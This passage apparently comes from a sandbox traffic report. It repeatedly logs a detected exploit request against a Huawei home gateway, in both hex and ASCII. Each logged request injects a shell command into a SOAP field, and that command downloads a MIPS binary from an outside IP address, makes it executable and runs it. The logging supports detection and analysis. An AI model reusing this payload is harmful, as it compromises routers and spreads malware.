xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 